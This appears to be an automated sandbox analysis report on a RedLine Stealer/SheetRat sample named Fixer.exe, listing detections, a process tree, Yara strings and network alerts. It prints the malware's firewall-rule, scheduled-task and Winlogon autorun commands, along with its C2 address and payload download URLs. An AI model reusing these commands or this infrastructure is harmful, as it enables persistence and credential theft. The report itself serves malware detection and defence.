Windows Analysis Report
Fixer.exe

Overview

General Information

Sample name: Fixer.exe
Analysis ID: 1585853
MD5: 2acda1f917022e9e8081ad69b15330c6
SHA1: 3bad975d496a0066d64470e4ae1002794581c4f8
SHA256: 7bc2586b6d70b12f116dc8f538f58665620a765e2c764a5c143b06ec97bacfc0

Detection

RedLine, SheetRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected RedLine Stealer
Yara detected SheetRat
.NET source code contains potential unpacker
Allows loading of unsigned dll using appinit_dll
C2 URLs / IPs found in malware configuration
Contains functionality to capture screen (.Net source)
Creates an undocumented autostart registry key
Drops executables to the windows directory (C:\Windows) and starts them
Drops large PE files
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the windows firewall
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion NT Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64native
  • Fixer.exe (PID: 7492 cmdline: "C:\Users\user\Desktop\Fixer.exe" MD5: 2ACDA1F917022E9E8081AD69B15330C6)
    • 6z9uno0baqvej0me.exe (PID: 5376 cmdline: "C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe" MD5: 2E2BF344AC14353A679CCDD682273BE0)
      • cmd.exe (PID: 7376 cmdline: "CMD" netsh advfirewall firewall add rule name="7=PG%XL(%PSA%R" dir=in action=allow program="C:\Windows\System32\xdwdSecurityHealthSystrays.exe" enable=yes & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • cmd.exe (PID: 7072 cmdline: "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\Windows\SecurityHealthSystray12" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • schtasks.exe (PID: 3376 cmdline: schtasks /create /f /sc minute /mo 1 /tn "Microsoft\Windows\SecurityHealthSystray12" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST MD5: 796B784E98008854C27F4B18D287BA30)
      • cmd.exe (PID: 6596 cmdline: "cmd" /c schtasks /create /f /sc minute /mo 30 /tn "Microsoft\Windows\Schost" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • schtasks.exe (PID: 6592 cmdline: schtasks /create /f /sc minute /mo 30 /tn "Microsoft\Windows\Schost" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST MD5: 796B784E98008854C27F4B18D287BA30)
    • FixerNerest.exe (PID: 8148 cmdline: "C:\Users\user\AppData\Local\Temp\FixerNerest.exe" MD5: 094EBE271C9334745C238FC2BA77FD38)
      • WmiPrvSE.exe (PID: 824 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • cmd.exe (PID: 5008 cmdline: "CMD" netsh advfirewall firewall add rule name=",%MUc}<NcMKXc_" dir=in action=allow program="C:\Windows\System32\Defender.exe" enable=yes & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • cmd.exe (PID: 8152 cmdline: "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • schtasks.exe (PID: 7944 cmdline: schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST MD5: 796B784E98008854C27F4B18D287BA30)
      • Defender.exe (PID: 2232 cmdline: "C:\Windows\System32\Defender.exe" MD5: 6C49C48E82A1B13AC0406AD8B049E7DE)
  • Defender.exe (PID: 2660 cmdline: C:\Windows\System32\Defender.exe MD5: 6C49C48E82A1B13AC0406AD8B049E7DE)
  • Defender.exe (PID: 3268 cmdline: C:\Windows\System32\Defender.exe MD5: 6C49C48E82A1B13AC0406AD8B049E7DE)
  • cleanup
Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": ["89.23.97.121:1112"], "Bot Id": "Umbrella", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
Source: Fixer.exe, Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Author: Joe Security
Source: Fixer.exe, Rule: infostealer_win_redline_strings, Description: Finds Redline samples based on characteristic strings, Author: Sekoia.io, Strings:
    • 0x24cc3:$gen01: ChromeGetRoamingName
    • 0x24ce8:$gen02: ChromeGetLocalName
    • 0x24d2b:$gen03: get_UserDomainName
    • 0x28bc4:$gen04: get_encrypted_key
    • 0x27943:$gen05: browserPaths
    • 0x27c19:$gen06: GetBrowsers
    • 0x27501:$gen07: get_InstalledInputLanguages
    • 0x239cc:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION
    • 0x3018:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}
    • 0x29006:$spe7: OFileInfopeFileInfora GFileInfoX StabFileInfole
    • 0x290a4:$spe8: ApGenericpDaGenericta\RGenericoamiGenericng\
    • 0x296c4:$spe9: *wallet*
    • 0x219ea:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0
    • 0x21f14:$typ03: A937C899247696B6565665BE3BD09607F49A2042
    • 0x21fc1:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2
    • 0x21998:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60
    • 0x219c1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280
    • 0x21b92:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301
    • 0x21de5:$typ11: 2A19BFD7333718195216588A698752C517111B02
    • 0x220d4:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13

Source: dump.pcap, Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Author: Joe Security

Source: 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: 00000002.00000002.52853780716.00000000127E1000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_SheetRat, Description: Yara detected SheetRat, Author: Joe Security
Source: 00000000.00000000.52343849796.0000000000672000.00000002.00000001.01000000.00000003.sdmp, Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Author: Joe Security
Source: 00000000.00000002.52600457326.0000000002E87000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: Process Memory Space: Fixer.exe PID: 7492, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security

Source: 2.2.6z9uno0baqvej0me.exe.12803b30.1.raw.unpack, Rule: JoeSecurity_SheetRat, Description: Yara detected SheetRat, Author: Joe Security
Source: 2.2.6z9uno0baqvej0me.exe.12803b30.1.unpack, Rule: JoeSecurity_SheetRat, Description: Yara detected SheetRat, Author: Joe Security
Source: 0.0.Fixer.exe.670000.0.unpack, Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Author: Joe Security
Source: 0.0.Fixer.exe.670000.0.unpack, Rule: infostealer_win_redline_strings, Description: Finds Redline samples based on characteristic strings, Author: Sekoia.io, Strings:
    • 0x24cc3:$gen01: ChromeGetRoamingName
    • 0x24ce8:$gen02: ChromeGetLocalName
    • 0x24d2b:$gen03: get_UserDomainName
    • 0x28bc4:$gen04: get_encrypted_key
    • 0x27943:$gen05: browserPaths
    • 0x27c19:$gen06: GetBrowsers
    • 0x27501:$gen07: get_InstalledInputLanguages
    • 0x239cc:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION
    • 0x3018:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}
    • 0x29006:$spe7: OFileInfopeFileInfora GFileInfoX StabFileInfole
    • 0x290a4:$spe8: ApGenericpDaGenericta\RGenericoamiGenericng\
    • 0x296c4:$spe9: *wallet*
    • 0x219ea:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0
    • 0x21f14:$typ03: A937C899247696B6565665BE3BD09607F49A2042
    • 0x21fc1:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2
    • 0x21998:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60
    • 0x219c1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280
    • 0x21b92:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301
    • 0x21de5:$typ11: 2A19BFD7333718195216588A698752C517111B02
    • 0x220d4:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13

System Summary

Source: Process started, Author: Jonathan Cheong, oscd.community: Data: Command: "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\Windows\SecurityHealthSystray12" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST & exit, CommandLine: "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\Windows\SecurityHealthSystray12" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe, ParentProcessId: 5376, ParentProcessName: 6z9uno0baqvej0me.exe, ProcessCommandLine: "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\Windows\SecurityHealthSystray12" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST & exit, ProcessId: 7072, ProcessName: cmd.exe
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\System32\userinit.exe,C:\Windows\System32\xdwdSecurityHealthSystrays.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe, ProcessId: 5376, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-08T11:24:21.630664+0100 | 2043234 | 1 | A Network Trojan was detected | 89.23.97.121 | 1112 | 192.168.11.20 | 49748 | TCP
2025-01-08T11:24:21.358270+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:26.669865+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:27.070524+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:27.708030+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:28.033899+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:28.848988+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:29.121943+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:29.393622+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:29.695937+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:29.970275+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:30.244400+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:30.586256+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:30.939569+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:31.213342+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:31.488362+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:31.806733+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:33.019673+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:33.293505+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:33.566799+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:33.845047+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:34.117796+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:34.472435+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:34.743199+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:37.512019+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:37.783860+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:41.963009+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:42.273238+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:21.358270+0100 | 2046045 | 1 | A Network Trojan was detected | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:40.760334+0100 | 2803305 | 3 | Unknown Traffic | 192.168.11.20 | 49749 | 89.23.97.121 | 1911 | TCP

AV Detection

Source: C:\Windows\System32\Defender.exe, Avira: detection malicious, Label: TR/Crypt.OPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe, Avira: detection malicious, Label: HEUR/AGEN.1310090
Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exe, Avira: detection malicious, Label: TR/Crypt.OPACK.Gen
Source: Fixer.exe, Malware Configuration Extractor: RedLine {"C2 url": ["89.23.97.121:1112"], "Bot Id": "Umbrella", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
Source: Fixer.exe, ReversingLabs: Detection: 68%
Source: Fixer.exe, Virustotal: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe, Joe Sandbox ML: detected
Source: Fixer.exe, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\Fixer.exe, Code function: 0_2_0623B670 CryptUnprotectData,0_2_0623B670
Source: C:\Users\user\Desktop\Fixer.exe, Code function: 0_2_0623BC71 CryptUnprotectData,0_2_0623BC71
Source: Fixer.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Fixer.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\Malware\Desktop\hack tool\Backdoor\SheetRat\SheetRat\bin\Release\Stub\UserMode.pdb source: 6z9uno0baqvej0me.exe, 00000002.00000002.52853780716.00000000127E1000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe, File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe, File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe, File opened: C:\Users\user\AppData\Roaming

Networking

Source: Network traffic, Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.11.20:49748 -> 89.23.97.121:1112
Source: Network traffic, Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.11.20:49748 -> 89.23.97.121:1112
Source: Network traffic, Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 89.23.97.121:1112 -> 192.168.11.20:49748
Source: Malware configuration extractor, URLs: 89.23.97.121:1112
Source: unknown, Network traffic detected: HTTP traffic on port 49749 -> 1911
Source: unknown, Network traffic detected: HTTP traffic on port 1911 -> 49749
Source: global traffic, TCP traffic: 192.168.11.20:49748 -> 89.23.97.121:1112
Source: global traffic, TCP traffic: 192.168.11.20:49750 -> 147.185.221.24:61069
Source: global traffic, HTTP traffic detected: GET /6z9uno0baqvej0me.exe HTTP/1.1, Host: 89.23.97.121:1911, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /FixerNerest.exe HTTP/1.1, Host: 89.23.97.121:1911
Source: Joe Sandbox View, IP Address: 147.185.221.24
Source: Joe Sandbox View, ASN Name: MAXITEL-ASRU
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49749 -> 89.23.97.121:1911
Source: unknown, TCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: global traffic; DNS traffic detected: DNS query: et-seattle.gl.at.ply.gg
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://89.23.97.121:1911
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://89.23.97.121:1911/6z9uno0baqvej0me.exe
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://89.23.97.121:1911/FixerNerest.exe
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18ResponseD
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19ResponseD
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002E01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20ResponseD
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000003024000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24ResponseD
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4ResponseD
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5ResponseD
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
